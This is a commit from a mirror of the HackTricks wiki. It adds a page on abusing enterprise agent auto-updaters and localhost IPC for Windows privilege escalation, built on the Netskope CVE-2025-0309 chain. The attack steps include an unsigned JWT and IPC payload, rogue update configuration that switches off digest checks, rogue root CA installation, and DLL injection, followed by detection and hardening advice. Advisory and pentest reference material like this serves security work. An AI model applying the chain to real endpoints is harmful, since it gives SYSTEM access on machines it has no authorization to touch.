maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1374 from HackTricks-wiki/update_Advisory___Netskope_Client_for_Windows___Local_Pri_20250830_184240

Browse Source 
Advisory – Netskope Client for Windows – Local Privilege Esc...
This commit is contained in:
SirBroccoli 2025-09-03 16:02:19 +02:00 committed by GitHub
commit 58d3d25f62
4 changed files with 136 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -236,6 +236,7 @@
- [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md)
- [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md)
- [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
- [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
- [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
- [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
- [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)

1
src/windows-hardening/checklist-windows-privilege-escalation.md
View File

@ -15,6 +15,7 @@
- [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)?
- [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)?
- [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)?
- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
- [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)?
### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)

9
src/windows-hardening/windows-local-privilege-escalation/README.md
View File

@ -228,6 +228,15 @@ Basically, this is the flaw that this bug exploits:
You can exploit this vulnerability using the tool [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (once it's liberated).
## Third-Party Auto-Updaters and Agent IPC (local privesc)
Many enterprise agents expose a localhost IPC surface and a privileged update channel. If enrollment can be coerced to an attacker server and the updater trusts a rogue root CA or weak signer checks, a local user can deliver a malicious MSI that the SYSTEM service installs. See a generalized technique (based on the Netskope stAgentSvc chain CVE-2025-0309) here:
{{#ref}}
abusing-auto-updaters-and-ipc.md
{{#endref}}
## KrbRelayUp
A **local privilege escalation** vulnerability exists in Windows **domain** environments under specific conditions. These conditions include environments where **LDAP signing is not enforced,** users possess self-rights allowing them to configure **Resource-Based Constrained Delegation (RBCD),** and the capability for users to create computers within the domain. It is important to note that these **requirements** are met using **default settings**.

125
src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md Normal file
View File

@ -0,0 +1,125 @@
# Abusing Enterprise Auto-Updaters and Privileged IPC (e.g., Netskope stAgentSvc)
{{#include ../../banners/hacktricks-training.md}}
This page generalizes a class of Windows local privilege escalation chains found in enterprise endpoint agents and updaters that expose a lowfriction IPC surface and a privileged update flow. A representative example is Netskope Client for Windows < R129 (CVE-2025-0309), where a lowprivileged user can coerce enrollment into an attackercontrolled server and then deliver a malicious MSI that the SYSTEM service installs.
Key ideas you can reuse against similar products:
- Abuse a privileged services localhost IPC to force reenrollment or reconfiguration to an attacker server.
- Implement the vendors update endpoints, deliver a rogue Trusted Root CA, and point the updater to a malicious, “signed” package.
- Evade weak signer checks (CN allowlists), optional digest flags, and lax MSI properties.
- If IPC is “encrypted”, derive the key/IV from worldreadable machine identifiers stored in the registry.
- If the service restricts callers by image path/process name, inject into an allowlisted process or spawn one suspended and bootstrap your DLL via a minimal threadcontext patch.
---
## 1) Forcing enrollment to an attacker server via localhost IPC
Many agents ship a usermode UI process that talks to a SYSTEM service over localhost TCP using JSON.
Observed in Netskope:
- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM)
- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN
Exploit flow:
1) Craft a JWT enrollment token whose claims control the backend host (e.g., AddonUrl). Use alg=None so no signature is required.
2) Send the IPC message invoking the provisioning command with your JWT and tenant name:
```json
{
"148": {
"idpTokenValue": "<JWT with AddonUrl=attacker-host; header alg=None>",
"tenantName": "TestOrg"
}
}
```
3) The service starts hitting your rogue server for enrollment/config, e.g.:
- /v1/externalhost?service=enrollment
- /config/user/getbrandingbyemail
Notes:
- If caller verification is path/namebased, originate the request from a allowlisted vendor binary (see §4).
---
## 2) Hijacking the update channel to run code as SYSTEM
Once the client talks to your server, implement the expected endpoints and steer it to an attacker MSI. Typical sequence:
1) /v2/config/org/clientconfig → Return JSON config with a very short updater interval, e.g.:
```json
{
"clientUpdate": { "updateIntervalInMin": 1 },
"check_msi_digest": false
}
```
2) /config/ca/cert → Return a PEM CA certificate. The service installs it into the Local Machine Trusted Root store.
3) /v2/checkupdate → Supply metadata pointing to a malicious MSI and a fake version.
Bypassing common checks seen in the wild:
- Signer CN allowlist: the service may only check the Subject CN equals “netSkope Inc” or “Netskope, Inc.”. Your rogue CA can issue a leaf with that CN and sign the MSI.
- CERT_DIGEST property: include a benign MSI property named CERT_DIGEST. No enforcement at install.
- Optional digest enforcement: config flag (e.g., check_msi_digest=false) disables extra cryptographic validation.
Result: the SYSTEM service installs your MSI from
C:\ProgramData\Netskope\stAgent\data\*.msi
executing arbitrary code as NT AUTHORITY\SYSTEM.
---
## 3) Forging encrypted IPC requests (when present)
From R127, Netskope wrapped IPC JSON in an encryptData field that looks like Base64. Reversing showed AES with key/IV derived from registry values readable by any user:
- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew
- IV = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
Attackers can reproduce encryption and send valid encrypted commands from a standard user. General tip: if an agent suddenly “encrypts” its IPC, look for device IDs, product GUIDs, install IDs under HKLM as material.
---
## 4) Bypassing IPC caller allowlists (path/name checks)
Some services try to authenticate the peer by resolving the TCP connections PID and comparing the image path/name against allowlisted vendor binaries located under Program Files (e.g., stagentui.exe, bwansvc.exe, epdlp.exe).
Two practical bypasses:
- DLL injection into an allowlisted process (e.g., nsdiag.exe) and proxy IPC from inside it.
- Spawn an allowlisted binary suspended and bootstrap your proxy DLL without CreateRemoteThread (see §5) to satisfy driverenforced tamper rules.
---
## 5) Tamperprotection friendly injection: suspended process + NtContinue patch
Products often ship a minifilter/OB callbacks driver (e.g., Stadrv) to strip dangerous rights from handles to protected processes:
- Process: removes PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME
- Thread: restricts to THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE
A reliable usermode loader that respects these constraints:
1) CreateProcess of a vendor binary with CREATE_SUSPENDED.
2) Obtain handles youre still allowed to: PROCESS_VM_WRITE | PROCESS_VM_OPERATION on the process, and a thread handle with THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (or just THREAD_RESUME if you patch code at a known RIP).
3) Overwrite ntdll!NtContinue (or other early, guaranteedmapped thunk) with a tiny stub that calls LoadLibraryW on your DLL path, then jumps back.
4) ResumeThread to trigger your stub inprocess, loading your DLL.
Because you never used PROCESS_CREATE_THREAD or PROCESS_SUSPEND_RESUME on an alreadyprotected process (you created it), the drivers policy is satisfied.
---
## 6) Practical tooling
- NachoVPN (Netskope plugin) automates a rogue CA, malicious MSI signing, and serves the needed endpoints: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate.
- UpSkope is a custom IPC client that crafts arbitrary (optionally AESencrypted) IPC messages and includes the suspendedprocess injection to originate from an allowlisted binary.
---
## 7) Detection opportunities (blue team)
- Monitor additions to Local Machine Trusted Root. Sysmon + registrymod eventing (see SpecterOps guidance) works well.
- Flag MSI executions initiated by the agents service from paths like C:\ProgramData\<vendor>\<agent>\data\*.msi.
- Review agent logs for unexpected enrollment hosts/tenants, e.g.: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log look for addonUrl / tenant anomalies and provisioning msg 148.
- Alert on localhost IPC clients that are not the expected signed binaries, or that originate from unusual child process trees.
---
## Hardening tips for vendors
- Bind enrollment/update hosts to a strict allowlist; reject untrusted domains in clientcode.
- Authenticate IPC peers with OS primitives (ALPC security, namedpipe SIDs) instead of image path/name checks.
- Keep secret material out of worldreadable HKLM; if IPC must be encrypted, derive keys from protected secrets or negotiate over authenticated channels.
- Treat the updater as a supplychain surface: require a full chain to a trusted CA you control, verify package signatures against pinned keys, and fail closed if validation is disabled in config.
## References
- [Advisory Netskope Client for Windows Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/)
- [NachoVPN Netskope plugin](https://github.com/AmberWolfCyber/NachoVPN)
- [UpSkope Netskope IPC client/exploit](https://github.com/AmberWolfCyber/UpSkope)
- [NVD CVE-2025-0309](https://nvd.nist.gov/vuln/detail/CVE-2025-0309)
{{#include ../../banners/hacktricks-training.md}}